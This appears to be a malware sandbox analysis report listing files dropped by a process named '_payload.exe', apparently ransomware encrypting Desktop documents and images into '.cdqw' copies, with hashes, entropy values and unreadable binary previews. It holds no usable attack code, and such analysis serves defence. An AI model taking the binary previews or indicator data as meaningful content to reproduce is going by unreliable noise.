                                                                                                                                                                      Preview:NIKHQq...mqO+..5...i...#>..N..$..l..z.s.!...m}.Zt..~.q.F...X.o3G>....m...\ex........\a.r..|..pM......m).,Ld.^.N%.6WF..Phf.J.cUY...lN..].k...v.Tv.w.L_.....\.b.........lS7\P.....Au--Fn+.M.B....z&^.;..n.dy.)@&.(..Z......M.v......Z......n>.r}..~....w.s.P...m.r[?....._.j..*G...xh.M$...;|{k..FD.1_5..#.t..Y.r1.3Tw^...A...5uIIU..RY:.Z...]..x.y% .Hy\.......3W....[B.._+.d.[.R.A&gt g.../..........a.f../...%^..%.K.p.y18..u......\.>.%.:<.&A..{.T.u..Q.<f...7.f.....g.....N......W?.0..i...C8...W.bp.D.8:....l..y...}.1<....W6..(..u2.s.Z..g^...5..X.L./.K.u.."Y..X...8..A7).......lT.i.8._s.O..|.(3...E...."..oe..'@1OM.mVH...\.G....4..}.&.W`....r1K.U.=..K..%..il.N.....W..g.yl..w6.f.^>...F.)...F.|....f(bl..["......jc.6.........s.. .!..Wx..k?{...G.q..U2..7......X..C.+....Bm...S!).!S.8,....j...).........7.D...Ht+..7..........e.L.Gp..<_.l.d"K...Q....-.Qp0..L.QDE..2.4...sN..Wx....-(.A(;;...#0K...........'.9.'........n.;....DI.k........|.R.?...~... f.2...g....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848312726555403
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:540h/lj/3Ott3HUdSyyGN/BUQfb4Gq/EvmimYrLc+p5+5amLLOhqfFBFP42bD:m0hFfet3HQTKQkZEvmiXhp50aSLOhCFn
                                                                                                                                                                      MD5:83DB020C5DAAA1978AB404D189968804
                                                                                                                                                                      SHA1:024A7567B0E1E68C0FCCC3468436BE5C1814905A
                                                                                                                                                                      SHA-256:7E2C2C8EBCC02B6D900D5C853C204E338AEB6032007EC144B899D0E0D556E538
                                                                                                                                                                      SHA-512:F0DFED7ACCBFB11DB6E93263E1EE3C91BF4FB12A64023451871B138F046A4A3D02460D3978EBA15C266CCBE5673B20DD08DA5220B11F6DFC3EBCD75D6C610D84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG.Ib..'W1|....Ts. S.H#....H.....YR..y*...g....y.j*.76..].K7@..f.Y.w..A...H.."$./n6..K..'.|.x4..H_n{w..`m.H.g.#.}+.~F..h....W.|...R....L..U.....!..L..5.1...X..].I._/.G...c....=...-.K.<j.w...T..`.$#..B.t....w...C..,WD..Op..J(..e.........m....7..~.;...l.....?... .U....D...a.Wq.0..;. "..G.]cJ....F..(WrEB....KQ.......V..2. b.5.kK..X..........C....cX.....V'p.}4..H..(.G.2.3..Y.L_X..........7.U.....]..;>.2=.v..."a'....fFe`n...Z.x|.e..w...YzDG.....K...X...z.e.6.&s..u.]3=/.....1u^..CI.|...z!jHI.?m.G[k.,..j&..%.A..#..&s...V..3.#...Y[..}.d.2N...C...Q...ZZ+..q8L_.x.#....6<....^.".G)..m....'..2....@...K)_....b|j.p...P..n..t...;..Hd-1..9..j..R.F.O.L.'..w..r..z.W.....O\...x.(...R..J.<.!...1..........$.[...C.aF.~.h...+../.$.e.`.h8N.".........6..8.p...EyS.....!...].....+...$..g..!^..}..%.Q8.2..N...W.....H..N..+....*DzH.:V;G..P..l.}.$t....8...}N.tTo...+_g.cMU.t....o..?..M@...b=./.c=..v..4....-.y.....fx..!..D..MD..o[.0....!.k.....O.._'..n.....Dp. l...

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.848312726555403
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:540h/lj/3Ott3HUdSyyGN/BUQfb4Gq/EvmimYrLc+p5+5amLLOhqfFBFP42bD:m0hFfet3HQTKQkZEvmiXhp50aSLOhCFn
                                                                                                                                                                      MD5:83DB020C5DAAA1978AB404D189968804
                                                                                                                                                                      SHA1:024A7567B0E1E68C0FCCC3468436BE5C1814905A
                                                                                                                                                                      SHA-256:7E2C2C8EBCC02B6D900D5C853C204E338AEB6032007EC144B899D0E0D556E538
                                                                                                                                                                      SHA-512:F0DFED7ACCBFB11DB6E93263E1EE3C91BF4FB12A64023451871B138F046A4A3D02460D3978EBA15C266CCBE5673B20DD08DA5220B11F6DFC3EBCD75D6C610D84
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDG.Ib..'W1|....Ts. S.H#....H.....YR..y*...g....y.j*.76..].K7@..f.Y.w..A...H.."$./n6..K..'.|.x4..H_n{w..`m.H.g.#.}+.~F..h....W.|...R....L..U.....!..L..5.1...X..].I._/.G...c....=...-.K.<j.w...T..`.$#..B.t....w...C..,WD..Op..J(..e.........m....7..~.;...l.....?... .U....D...a.Wq.0..;. "..G.]cJ....F..(WrEB....KQ.......V..2. b.5.kK..X..........C....cX.....V'p.}4..H..(.G.2.3..Y.L_X..........7.U.....]..;>.2=.v..."a'....fFe`n...Z.x|.e..w...YzDG.....K...X...z.e.6.&s..u.]3=/.....1u^..CI.|...z!jHI.?m.G[k.,..j&..%.A..#..&s...V..3.#...Y[..}.d.2N...C...Q...ZZ+..q8L_.x.#....6<....^.".G)..m....'..2....@...K)_....b|j.p...P..n..t...;..Hd-1..9..j..R.F.O.L.'..w..r..z.W.....O\...x.(...R..J.<.!...1..........$.[...C.aF.~.h...+../.$.e.`.h8N.".........6..8.p...EyS.....!...].....+...$..g..!^..}..%.Q8.2..N...W.....H..N..+....*DzH.:V;G..P..l.}.$t....8...}N.tTo...+_g.cMU.t....o..?..M@...b=./.c=..v..4....-.y.....fx..!..D..MD..o[.0....!.k.....O.._'..n.....Dp. l...

                                                                                                                                                                      C:\Users\user\Desktop\WKXEWIOTXI.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843782530771699
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NTqW6NuNN1NUD7hJYxw4sZS/BxCAKmlDJmk1c/lP8rlRiU4I0VQKe0EoTGDuQwrj:F6S3U3sxwK/BMLoJg/lUT5NKQKe0Eoqy
                                                                                                                                                                      MD5:12FAEE364E49416DF7CBDF1BE6B4F55F
                                                                                                                                                                      SHA1:E22BD477703874055C59CD4A9E69DEA04DA4A9EB
                                                                                                                                                                      SHA-256:81D1D6CAE42E4F53BF9F58585D7DB22BF791CB6F9C9B4634935175F9AC210E0E
                                                                                                                                                                      SHA-512:93634B15932A963B01955AFE3F202B9DADAFFD823373F6C1C6755E3A1ACC0D52C5FF93003830A151936C6557DE674440C0D53AF07208D9D36EF665C0E0D1CD45
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:WKXEW7.r].....":..g.._x..!W.E.f~.N..X.&.....3mY.f..<-.R..J..R&...B"...u...4..=...+%....D..........%.......z8.h.......~..0.p..Z&?..u..{.?..x..m.....42.F..7...~..*.n.....3..0..Fc.O...U.!..u....*...h..4.....f{G..Aa...l..O..m.{...t).dV.}...6.'.._.^. b...b..8]..6...g......-..R.5[,..:...c..I.......kj!\..!......8I...H.BY.i..?U..F..OV.8?...g..i.P. ~..&....|.c#.~.!.?.s0.A."...{.......s....H3.*B.~t.G..PL...U.A...qljm.a..,....v..{D..\=..V...5.d......PO....Ci~...w.U.;.H.-.VhO.R.#j#.....Q.J.N....T".u.l [....H..s..6..?.OH.5..n.(........Hi./s"...7....@.{D......<.....6........sA....^..........K._."u.......+.7........).b....*.......r..v...W.:.9...G...^.kwg.(4..Y5K.x.&....0.!E{.D......+.n.7.Hk.]... ]......:....s.l..Pvx.\.[2.gH?-;9...>\.y.. .......`9x..c.X!s.l. ..+..p..h.3....R.P.?..+-9%.....5../."c$/}...-...|..e..vJQ.4..q....C..d...8-.Z.....j.....,../..HZ...8..A.U%../N......z....r......;|.}...Iw.n.n=J.......1...r...j.....f.......v..q.. s.T."...#.p[.'..=..

                                                                                                                                                                      C:\Users\user\Desktop\WKXEWIOTXI.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843782530771699
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NTqW6NuNN1NUD7hJYxw4sZS/BxCAKmlDJmk1c/lP8rlRiU4I0VQKe0EoTGDuQwrj:F6S3U3sxwK/BMLoJg/lUT5NKQKe0Eoqy
                                                                                                                                                                      MD5:12FAEE364E49416DF7CBDF1BE6B4F55F
                                                                                                                                                                      SHA1:E22BD477703874055C59CD4A9E69DEA04DA4A9EB
                                                                                                                                                                      SHA-256:81D1D6CAE42E4F53BF9F58585D7DB22BF791CB6F9C9B4634935175F9AC210E0E
                                                                                                                                                                      SHA-512:93634B15932A963B01955AFE3F202B9DADAFFD823373F6C1C6755E3A1ACC0D52C5FF93003830A151936C6557DE674440C0D53AF07208D9D36EF665C0E0D1CD45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW7.r].....":..g.._x..!W.E.f~.N..X.&.....3mY.f..<-.R..J..R&...B"...u...4..=...+%....D..........%.......z8.h.......~..0.p..Z&?..u..{.?..x..m.....42.F..7...~..*.n.....3..0..Fc.O...U.!..u....*...h..4.....f{G..Aa...l..O..m.{...t).dV.}...6.'.._.^. b...b..8]..6...g......-..R.5[,..:...c..I.......kj!\..!......8I...H.BY.i..?U..F..OV.8?...g..i.P. ~..&....|.c#.~.!.?.s0.A."...{.......s....H3.*B.~t.G..PL...U.A...qljm.a..,....v..{D..\=..V...5.d......PO....Ci~...w.U.;.H.-.VhO.R.#j#.....Q.J.N....T".u.l [....H..s..6..?.OH.5..n.(........Hi./s"...7....@.{D......<.....6........sA....^..........K._."u.......+.7........).b....*.......r..v...W.:.9...G...^.kwg.(4..Y5K.x.&....0.!E{.D......+.n.7.Hk.]... ]......:....s.l..Pvx.\.[2.gH?-;9...>\.y.. .......`9x..c.X!s.l. ..+..p..h.3....R.P.?..+-9%.....5../."c$/}...-...|..e..vJQ.4..q....C..d...8-.Z.....j.....,../..HZ...8..A.U%../N......z....r......;|.}...Iw.n.n=J.......1...r...j.....f.......v..q.. s.T."...#.p[.'..=..

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857187327525586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6PVKq2ZDIhuL3k1SIhACSV7tS6Q4RLbJ21hs8PeVy/VV5cjVotmELtED2qlArGlX:OUkhuLESIxY7xV21yVYSjULEDNlz5D
                                                                                                                                                                      MD5:18C190109FC740447A9DF9D729EEDDAC
                                                                                                                                                                      SHA1:4E34ED54CCB083A2CCE4A4EE2539F3490BD4CE20
                                                                                                                                                                      SHA-256:A146C8A765EC1BA8BF99958057AAA66C845CF871AF476E05DFC796E995E4C353
                                                                                                                                                                      SHA-512:B3EB6D6B0F0AFA6C7CA13B845A7CC49E87E7242956A098F7F5C822CE3B2854198FB8E2503BBFD7F58399D1C28BA77B992CA27D1993A480792DB92BAED9B2601E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA.a[.4,..X.L'.A....Ho.7...."..+~dw^.V...y3c4....F3^1..Q.e.......v.>:.X0=.3i.A./....q..LPo....!..U..;7yi..zM[.t.......H./..:...N....>?.;.4..lU,e.vB.TZ....nIWo~+.A...W...Y..%..Gz..8.[I./..9_..Q..6Q.........U.....=..n..b..x.Ex..%..+..........B...NZ^g.....>d..ffX~)...R..0w.B...e...1.. .:O.c..&Jc]HzZ.*.....;.e..F.vC?.......lp...K .Ip...{R....Y.D.v;.$..l.[...$..a...c....'J!..k.&..C^..&...U1.......'R.z...._.Cv8.X.#+.Q....I.&.0/....-f=Rx>6.a..Sj..=...@..]f...lE.T...E[o@.p.1...I)W..... ...5}.j.....^.b..f.....,....n^.G..%.*'@0{.k...1..\!R...$._..?.\....U.....P...2.1..w=`.6Vm..\...1..4..1.U...LzO..'.i.P"....(..B..Fn..V...C...%.J...!o....zi..:...W...H|/BL....u.....Av...9y.d..t....$..p.p.{...|..3....8..U[w.....e.E../O..$!8.}.[.....M.h.b.X..b4[..9.W.OS.9...5W......X...M...F..P..!....3..p.....wC@}...y..9...az.*.S...i..B.Q|..d.O1U.@$d..p......@........i.(-....u%o.w.V.W6...".o..:PR%..4.?j.:..>Ht.C...<C.C.h....m.....c.T<..c.i{.{9*..."L..}@.S'.gM..'#U...2j..J.P

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.857187327525586
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6PVKq2ZDIhuL3k1SIhACSV7tS6Q4RLbJ21hs8PeVy/VV5cjVotmELtED2qlArGlX:OUkhuLESIxY7xV21yVYSjULEDNlz5D
                                                                                                                                                                      MD5:18C190109FC740447A9DF9D729EEDDAC
                                                                                                                                                                      SHA1:4E34ED54CCB083A2CCE4A4EE2539F3490BD4CE20
                                                                                                                                                                      SHA-256:A146C8A765EC1BA8BF99958057AAA66C845CF871AF476E05DFC796E995E4C353
                                                                                                                                                                      SHA-512:B3EB6D6B0F0AFA6C7CA13B845A7CC49E87E7242956A098F7F5C822CE3B2854198FB8E2503BBFD7F58399D1C28BA77B992CA27D1993A480792DB92BAED9B2601E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA.a[.4,..X.L'.A....Ho.7...."..+~dw^.V...y3c4....F3^1..Q.e.......v.>:.X0=.3i.A./....q..LPo....!..U..;7yi..zM[.t.......H./..:...N....>?.;.4..lU,e.vB.TZ....nIWo~+.A...W...Y..%..Gz..8.[I./..9_..Q..6Q.........U.....=..n..b..x.Ex..%..+..........B...NZ^g.....>d..ffX~)...R..0w.B...e...1.. .:O.c..&Jc]HzZ.*.....;.e..F.vC?.......lp...K .Ip...{R....Y.D.v;.$..l.[...$..a...c....'J!..k.&..C^..&...U1.......'R.z...._.Cv8.X.#+.Q....I.&.0/....-f=Rx>6.a..Sj..=...@..]f...lE.T...E[o@.p.1...I)W..... ...5}.j.....^.b..f.....,....n^.G..%.*'@0{.k...1..\!R...$._..?.\....U.....P...2.1..w=`.6Vm..\...1..4..1.U...LzO..'.i.P"....(..B..Fn..V...C...%.J...!o....zi..:...W...H|/BL....u.....Av...9y.d..t....$..p.p.{...|..3....8..U[w.....e.E../O..$!8.}.[.....M.h.b.X..b4[..9.W.OS.9...5W......X...M...F..P..!....3..p.....wC@}...y..9...az.*.S...i..B.Q|..d.O1U.@$d..p......@........i.(-....u%o.w.V.W6...".o..:PR%..4.?j.:..>Ht.C...<C.C.h....m.....c.T<..c.i{.{9*..."L..}@.S'.gM..'#U...2j..J.P

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841426738957483
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EteiTLueAbBUSZEONAZ72r8wE/x0ZI5UiGBjPRE11oJpm3dRuJZw62bD:/kLXANUmEOKZir15Z+7atw188RcZwxD
                                                                                                                                                                      MD5:DB0D739D49FF036472DE3FD007318530
                                                                                                                                                                      SHA1:D829FEADA215EFDE61C668CD8ACFFD7A3C0FF6FD
                                                                                                                                                                      SHA-256:26B73F504094837E9BA9AF267813EF599970BC94E1AA87229AFE79D3D0D4EBB1
                                                                                                                                                                      SHA-512:7CD400168AF97169602DACDF36583555B74F28B16E54C648F61FF7A20AFEE3BDF60CD2298CC139B1E01A31A0671F198EE1D5C34A0A6DB5CB8FB0B445917CCA3D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAXm.}.<*S..Dj.;.............V..}vycd!.'........G.....!."...i.n.0.a.H.K.]W__0.t.....zf..b(...}2mY.#Cv.j..tRAAa.ob...4.../h.$.$.....=3..Zq.R....Z.....xn......G.w..Z.Hy.y..7..n.}..|..3.p.2Q0..A.ng..b.P.O..<C.....#;K.......F..b......E..U.....Z..4?"'/....$f. ?&..V....z.~.....p....n..8oS...B...G..Wf.fR......[.r$E..Z.../.B.......X.4......4..../.A.....q).B.....v.!..Un.........z....\.s..mO...8.....rC2.{..a..............+.......D....n.pb.....9.P[x&6r}Lid........=......4....`...2...hzh....6A0..4..F.k9w.<B.P.H....iv4_.`nx....Q..e....b.Plf..k..D.v.X.K..%^Y......,.j..".c.eJ....D...0...h.9..[>..5z..t..kOT:...Z!\.b].:AQ...;.pj...1..5&.=.9.....r..V..Tx%B...z.>..........|..]..~f..Y..9J#..w....J......H.$...><}wM.m..H.....r..I.o....5..p.4......._...:.!:......0.eq...^..]f..|....q..F...d.. .%i..36B......Q..+..fz....@Z..c.........N....V.9..{.e)=...A...h.NT..1F....a.0.l.f....+~..*uv..&V..P..1..~G...#(... ...P"./.s?dhD...._...n.?<-wr.(.7..'........Y...)|.......

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.841426738957483
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:EteiTLueAbBUSZEONAZ72r8wE/x0ZI5UiGBjPRE11oJpm3dRuJZw62bD:/kLXANUmEOKZir15Z+7atw188RcZwxD
                                                                                                                                                                      MD5:DB0D739D49FF036472DE3FD007318530
                                                                                                                                                                      SHA1:D829FEADA215EFDE61C668CD8ACFFD7A3C0FF6FD
                                                                                                                                                                      SHA-256:26B73F504094837E9BA9AF267813EF599970BC94E1AA87229AFE79D3D0D4EBB1
                                                                                                                                                                      SHA-512:7CD400168AF97169602DACDF36583555B74F28B16E54C648F61FF7A20AFEE3BDF60CD2298CC139B1E01A31A0671F198EE1D5C34A0A6DB5CB8FB0B445917CCA3D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAXm.}.<*S..Dj.;.............V..}vycd!.'........G.....!."...i.n.0.a.H.K.]W__0.t.....zf..b(...}2mY.#Cv.j..tRAAa.ob...4.../h.$.$.....=3..Zq.R....Z.....xn......G.w..Z.Hy.y..7..n.}..|..3.p.2Q0..A.ng..b.P.O..<C.....#;K.......F..b......E..U.....Z..4?"'/....$f. ?&..V....z.~.....p....n..8oS...B...G..Wf.fR......[.r$E..Z.../.B.......X.4......4..../.A.....q).B.....v.!..Un.........z....\.s..mO...8.....rC2.{..a..............+.......D....n.pb.....9.P[x&6r}Lid........=......4....`...2...hzh....6A0..4..F.k9w.<B.P.H....iv4_.`nx....Q..e....b.Plf..k..D.v.X.K..%^Y......,.j..".c.eJ....D...0...h.9..[>..5z..t..kOT:...Z!\.b].:AQ...;.pj...1..5&.=.9.....r..V..Tx%B...z.>..........|..]..~f..Y..9J#..w....J......H.$...><}wM.m..H.....r..I.o....5..p.4......._...:.!:......0.eq...^..]f..|....q..F...d.. .%i..36B......Q..+..fz....@Z..c.........N....V.9..{.e)=...A...h.NT..1F....a.0.l.f....+~..*uv..&V..P..1..~G...#(... ...P"./.s?dhD...._...n.?<-wr.(.7..'........Y...)|.......

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858242869050033
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:moUniZFoCIx/80XMoeN1cD7G05sM/lglDrMNTprbC6uic2bD:mJA3Y0EMRN1cCM/0DI9prbC6uqD
                                                                                                                                                                      MD5:A9854AAD3597DC81C6FD75F9C00DA475
                                                                                                                                                                      SHA1:EAFF51024516E2A645C79BE47802FE2842A5DBE2
                                                                                                                                                                      SHA-256:D9677AABE76C3F1A44C2298863E8E8CE51741C99A3A5550E755F7E188ECA715D
                                                                                                                                                                      SHA-512:AC2A80258AC71818F52CA08ECCFF0D6E418C26F206E96910A996FDC0A4FE3FBB9138C5030E43CFD0E032B839EDBD6B2390FB3E02272CBA2DCA0D2A13914BB176
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBDV........N..@x....l..Kh.>s_.....%(e...@jJ..|V.........fU...J...............`.!..y 76.w.2x..R.7C..\g.[+ui.G.0..ex..{....%.k`....1...r.l..5..^... .s.7..&?..eC..`.:..c.W......~.......w..E....@=....*.F...z...O.......s...."..N..]4bYf......)\C...y..d.xy....yw.}.C..P#....*.....Jm..i..Z.r.z.3..54.K.5.DU9..e.Lr,U..d~..x..on.pB..|;5...W....-WU.n./.%Q..fE.!.....26%.p.7i(..+.f.A.u.....*A...'.R.@.,....7'.B!..#.S.8f....s.........H..(...VJ.`X.(....A3W....l..V...R...y0.n?!\..X..)S0..}...7(.;.....\......0..8.)....'Jg.XL....p%(rEr.....:..i9%T.X.51.."Q..-..T=.....j$..%.S%..}g:..H....3zd.`.....z.GfQ.....1.1K...a.l..IO.`F3....of7Uu.H.....[h..>y...s..Or..g..>FQ.Wp.......p.f......}._,.av..+.|...e....:T..M...T.'{..k.......To.P.X..3..<J...@..=2...=.._jJ..#.rn...............1..S.v.Kc......l....b..uO..w..H....X4+...W..w5E.Y..?.z\<%0....-{9..c...'-.....X..'.....J...)....W..k.g...t..'.;I.0.7...l.].......].k.W..|.....>:.j(?*.f.b.+'..:G.T.E_p......n..-.

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.858242869050033
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:moUniZFoCIx/80XMoeN1cD7G05sM/lglDrMNTprbC6uic2bD:mJA3Y0EMRN1cCM/0DI9prbC6uqD
                                                                                                                                                                      MD5:A9854AAD3597DC81C6FD75F9C00DA475
                                                                                                                                                                      SHA1:EAFF51024516E2A645C79BE47802FE2842A5DBE2
                                                                                                                                                                      SHA-256:D9677AABE76C3F1A44C2298863E8E8CE51741C99A3A5550E755F7E188ECA715D
                                                                                                                                                                      SHA-512:AC2A80258AC71818F52CA08ECCFF0D6E418C26F206E96910A996FDC0A4FE3FBB9138C5030E43CFD0E032B839EDBD6B2390FB3E02272CBA2DCA0D2A13914BB176
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBDV........N..@x....l..Kh.>s_.....%(e...@jJ..|V.........fU...J...............`.!..y 76.w.2x..R.7C..\g.[+ui.G.0..ex..{....%.k`....1...r.l..5..^... .s.7..&?..eC..`.:..c.W......~.......w..E....@=....*.F...z...O.......s...."..N..]4bYf......)\C...y..d.xy....yw.}.C..P#....*.....Jm..i..Z.r.z.3..54.K.5.DU9..e.Lr,U..d~..x..on.pB..|;5...W....-WU.n./.%Q..fE.!.....26%.p.7i(..+.f.A.u.....*A...'.R.@.,....7'.B!..#.S.8f....s.........H..(...VJ.`X.(....A3W....l..V...R...y0.n?!\..X..)S0..}...7(.;.....\......0..8.)....'Jg.XL....p%(rEr.....:..i9%T.X.51.."Q..-..T=.....j$..%.S%..}g:..H....3zd.`.....z.GfQ.....1.1K...a.l..IO.`F3....of7Uu.H.....[h..>y...s..Or..g..>FQ.Wp.......p.f......}._,.av..+.|...e....:T..M...T.'{..k.......To.P.X..3..<J...@..=2...=.._jJ..#.rn...............1..S.v.Kc......l....b..uO..w..H....X4+...W..w5E.Y..?.z\<%0....-{9..c...'-.....X..'.....J...)....W..k.g...t..'.;I.0.7...l.].......].k.W..|.....>:.j(?*.f.b.+'..:G.T.E_p......n..-.

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.851622102163727
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o4rsC3fLFgiDmVxymN/woBlL2zcoXmkd5xamjXwjk4wiG+StRn8aLBQ5X2fn2bD:o4rsCPL6pxymhBlmcYdtZi43HIXD
                                                                                                                                                                      MD5:FBA8EC285DAD38CD58054199997B8D5A
                                                                                                                                                                      SHA1:1164C7CAB6D85974DAABFFB7597343688C58ED3D
                                                                                                                                                                      SHA-256:63B742298976314D645A55849487D137980B2E074A17B9EFC7226C4EB67C1A84
                                                                                                                                                                      SHA-512:C28C4A525398448287C22CA084A7FE2C09CD439A4BA50F3CCAC0A66F83EC881364C81DB7E49B09A0639FE838345E03D2AA6C2F424B2223D3375F0C436E5AAAE3
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:XZXHA...NFt;$..uOQ.......OvY.9A~.G2.Y...w(mk..gz..S3..P.......W..2..K.0.:.$.#~.{)o...;..N.....|...K...~.&....hk..4.|..5.z.....#......:P..!..,....e1.e.D2......3/.S.C...p..\7.@.t...vQ...G....jMI<-..6a;.A.....&..i.KX([.....l..[.....)`...u......@...L...Hti.w.|.g.;.z....D....}2.#A.Mo.......x.|-......)....cDy..vix7m.Z.a..7..W..m_..6.=R.......="<O|..$r..?.6....Q.E.NYyQ...el.<P.1~...z.}.P...t...az...O.X..0D..0. :Z:..SZ.._".S..l...6..../|+.0..O...y....b*.].F.7e.........6..~..,[.T..,....q.e*....B..w..P})g.).g.Me.........o..2....H%+%...v.."F./...5.zv...h.m..A_........O..a.5..f.T.N.26h..0.W.T|.mR...:..x...p....9Y.Vu0./.A........#U.U.B.U..gxE`F.^...1...,.p...?.....E.^...!.'...Z/.s8&..c.2......j........]..X.Z...V/.....E..*.&A....TN..|oG...z.T--.|.8R.L.............6&..+.../B...$.B&e..........K..k.^.....#)....(....B..*..r.h..1.4...-.G%jI:.A.....:.....N.`.[5/s..Y."!.......|c.=.j..tU2..U...N_.].m.l..7.t.P...(.......$=.u..s8...MU.k...6.Wh.4..~./.8..N+."

                                                                                                                                                                      C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
